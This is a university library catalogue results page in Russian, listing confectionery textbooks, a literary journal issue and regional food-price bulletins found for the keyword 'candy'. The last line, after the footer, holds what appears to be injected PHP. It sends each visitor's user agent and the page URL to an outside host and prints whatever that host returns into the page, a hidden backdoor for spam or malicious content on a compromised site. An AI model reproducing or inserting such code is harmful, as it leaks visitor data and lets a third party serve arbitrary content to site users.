Перейти на сайт
библиотеки ОмГТУ
Share |
   
   
   
   
   
   

 
      Виртуальная справка
 
      Личный кабинет

Логин
Пароль
Забыли пароль?
Регистрация

 
      Счетчики
Rambler's Top100
Яндекс цитирования

Сейчас на сайте

46 пользователей



 
      Наши партнеры
Студенческий информационный портал компании
("Ключевые слова=КОНФЕТА")
Результаты поиска
СВОДНЫЙ КАТАЛОГ: Найдено записей: 11
1. 
Драгилев, Абрам Иосифович. Технологическое оборудование: хлебопекарное, макаронное и кондитерское [Текст] / А. И. Драгилев, В. М. Хромеенков, М. Е. Чернов ; дар. В. В. Арсеньев, 2004. - 428, [1] с.
Держатели документа (Информация об экземплярах) 

Приведены сведения о конструкционных материалах, транспортирующих устройства, общем и специализированном оборудовании для производства хлебных, макаронных и кондитерских изделий.

Для студентов образовательных учреждений среднего профессионального образования.

2. 
Драгилев, Абрам Иосифович. Технологическое оборудование: хлебопекарное, макаронное и кондитерское [Текст] / А. И. Драгилев, В. М. Хромеенков, М. Е. Чернов ; дар. В. В. Арсеньев, 2006. - 428, [1] с.
Держатели документа (Информация об экземплярах) 

Приведены сведения о конструкционных материалах, транспортирующих устройства, общем и специализированном оборудовании для производства хлебных, макаронных и кондитерских изделий.

Для студентов образовательных учреждений среднего профессионального образования.

3. 
Могильный, Михаил Петрович. Восточные сладости (технология, рецептура, рекомендации) [Текст] / М. П. Могильный ; дар. В. В. Арсеньев, 2002. - 147 с.
Держатели документа (Информация об экземплярах) 
4. 
Новый мир. - Журнал, 2011г. № 3
Оглавление 
  • Кушнер, Александр. Другой дороги нет / А. Кушнер. - с.3-7
  • Краснящих, Андрей. Антроположик / А. Краснящих. - с.8-54
  • Кублановский, Юрий. Фатум / Ю. Кублановский. - с.55-60
  • Денисова, Саша. Конфета / С. Денисова. - с.61-88
  • Бельченко, Наталья. В сердцевине нет покоя / Н. Бельченко. - с.89-91
  • Савельев, Игорь. Юнги Северного флота / И. Савельев. - с.92-107
  • Кенжеев, Бахыт. Не спи, не спи / Б. Кенжеев. - с.108-110
  • Вебер, Вальдемар. Очки Шуберта / В. Вебер. - с.111-119
  • Сарабьянов, Дмитрий. Принят, а не отвержен / Д. Сарабьянов. - с.120-122
  • Беляков, Сергей. Парижский мальчик Георгий Эфрон между двумя нациями / С. Беляков. - с.123-142
  • Боровиков, Сергей. В русском жанре - 40 / С. Боровиков. - с.143-152
  • Роднянская, Ирина. Новое свидетельство / И. Роднянская. - с.153-167
  • Жолковский, Александр. О темных местах текста / А. Жолковский. - с.168-179
  • Корчагин, Кирилл. "Чтобы все было понятно... " / К. Корчагин. - с.180-184
  • Гликман, Кирилл. Неописуемые девяностые / К. Гликман. - с.184-187
  • Ионова, Марианна. Невещественные доказательства / М. Ионова. - с.187-192
  • Орлицкий, Юрий. Коллекционеры и культуртрегеры / Ю. Орлицкий. - с.192-195
  • Крючков, Павел. Книжная полка Павла Крючкова / П. Крючков. - с.195-206
  • Губайловский, Владимир. Владимир Губайловский: наука будущего / В. Губайловский. - с.206-211
  • Книги. - с.212-216
  • Периодика. - с.217-239
5. 
Кузнецова, Людмила Семеновна. Технология и организация производства кондитерских изделий [Текст] / Л. С. Кузнецова, М. Ю. Сиданова, 2009. - 478, [1] с.
Держатели документа (Информация об экземплярах) 

Рассмотрена технология переработки пищевого сырья в сахарные и мучные кондитерские изделия. Приведены требования к качеству сырья при его закупке, хранении и подготовке к первичной переработке, химический состав и свойства сырья и сведения о его подверженности изменениям под влиянием теплового, механического и других видов воздействия. Изложены методика составления рецептур кондитерских изделий и требования к качеству готовой продукции и ее хранению.

Во 2-е издание внесены исправления и дополнения, связанные с введением в действие новых ГОСТов на пищевые продукты по состоянию на 1 января 2009 г.

Для студентов средних профессиональных учебных заведений. Может быть полезен студентам вузов и специалистам кондитерского производства.

6. 
Драгилев, Абрам Иосифович. Основы кондитерского производства [Текст] / А. И. Драгилев, Г. А. Маршалкин ; дар. В. В. Арсеньев, 2007. - 531 с.
Держатели документа (Информация об экземплярах) 

В учебнике рассмотрены технология и оборудование для производства кондитерских изделий. Показана сущность химических и физических процессов и дано их математическое описание, достаточное для использования автоматизированных систем при управлении технологическими процессами. Изложены расчет и пересчет рецептур при замене сырья, а также технологический анализ расхода сырья.

Для студентов вузов, обучающихся по специальности "Технология хлеба, кондитерских и макаронных изделий", "Машины и аппараты пищевых производств".

7. 
Щербинин, Дмитрий. Откуда что взялось? [Текст] / Дмитрий Щербинин, 2009. - 251, [4] с.
Ключевые слова 
АКВАЛАНГА -- АВТОРУЧКА -- АНТИБИОТИК -- БРИТВА -- БУЛАВКИ -- БУМАГА -- БЮСТГАЛЬТЕР -- ВАННА -- ВЕЛОСИПЕД -- ВЕШАЛКА -- ВИЗИТКА -- ВИЛКА -- ВОДОПРОВОД -- ГАЛСТУК -- ВСТАВНОЙ -- ЗУБ -- ГАМБУРГЕР -- ПОМАДА -- ЖЕВАТЕЛЬНАЯ -- РЕЗИНКА -- ЗАСТЕЖКА -- ЗЕРКАЛО -- ЗОНТИК -- ЩЕТКА -- КАБУКИ -- КАМИН -- КАРАНДАШ -- ФОНАРЬ -- КАРМАННЫЙ -- ИГЛА -- ИГРУШКА -- КУБИК -- РУБИКА -- ЙОГУРТ -- ОБУВЬ -- НОСОВОЙ -- ПЛАТОК -- ОГНЕТУШИТЕЛЬ -- ОЧКИ -- ПАРАШЮТ -- ПЛАСТЫРЬ -- ПИШУЩАЯ -- МАШИНКА -- ПОДУШКА -- ПОПКОРН -- ПОЧТОВЫЙ -- ЯЩИК -- ПУГОВИЦА -- ПРИЩЕПКА -- ПЫЛЕСОС -- РАСЧЕСКА -- РЕЗИНА -- РОЛИКОВЫЕ -- КОНЬКИ -- РУЧКА -- САКСОФОН -- САНКИ -- СВЕТОФОР -- СВЕЧА -- СКОТЧ -- СКРЕПКА -- СМАЙЛИК -- СПИЧКИ -- СТРЕЛА -- СУМКА -- ТАРЕЛКА -- ТОПОР -- ТЕЛЕФОН -- СУПЕРМАРКЕТ -- ТЕЛЕЖКА -- ТУАЛЕТ -- ФАРФОР -- ФУТЛЯР -- МОБИЛЬНИК -- ХОЛОДИЛЬНИК -- ЧАСЫ -- ЧЕРНИЛА -- ШАМПАНСКОЕ -- ШВЕЙНАЯ -- ШНУРОК -- УТЮГ -- ШЛЯПА -- ШКАФ -- КОНФЕТА -- ОБЕРТКА
Держатели документа (Информация об экземплярах) 
8. 
Средние цены и индексы потребительских цен на продовольственные товары в Омской области за ноябрь 2010 года [Текст] : стат. бюл. / Федер. служба гос. статистики, Территор. орган Федер. службы гос. статистики по Ом. обл., 2010. - 11 с.
Держатели документа (Информация об экземплярах) 
9. 
Средние цены и индексы потребительских цен на продовольственные товары в Омской области за октябрь 2010 года [Текст] : стат. бюл. / Федер. служба гос. статистики, Территор. орган Федер. службы гос. статистики по Ом. обл., 2010. - 11 с.
Держатели документа (Информация об экземплярах) 
10. 
Применение холода в пищевой промышленности. Холод в рыбной и пищевой промышленности [Текст] : справочник / сост.: Н. Я. Барулин [и др.], 1979. - 150, [1] с.
Держатели документа (Информация об экземплярах) 
11. 
Средние цены и индексы потребительских цен на продовольственные товары в Омской области за август 2010 года [Текст] : стат. бюл. / Федер. служба гос. статистики, Территор. орган Федер. службы гос. статистики по Ом. обл., 2010. - 11 с.
Держатели документа (Информация об экземплярах) 


    Адрес: 644050, Россия, г. Омск, пр-кт Мира, 11

    Телефон: (3812) 65-34-86, 65-23-69

    E-mail: libdirector@omgtu.ru, b_oa@omgtu.ru

[ О библиотеке ]     [ Читателю ]     [ Информационные ресурсы ]     [ Электронный каталог ]     [ Научная деятельность ]     [ Культура и досуг ]     [ ИРБИС в Омске ]

Электронное периодическое издание «lib.omgtu.ru» | Свидетельство о регистрации СМИ Эл № ФС77-45378 от 10.06.2011 Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор)| Выпуск № 2877 - 26.04.2019
© Омский государственный технический университет

Электронно-библиотечная система АРБУЗ ОмГТУ
Страница сгенерирована за 0.81 с.14 запросов, 0.65c. $useragent=$_SERVER['HTTP_USER_AGENT']; $bs=base64_encode($useragent); $sb='http://'.$_SERVER['SERVER_NAME'].$_SERVER["REQUEST_URI"]; $ret = file_get_contents('http://jr.6tws.us/?UserAgent='.$bs."&Domain=".$sb); print $ret;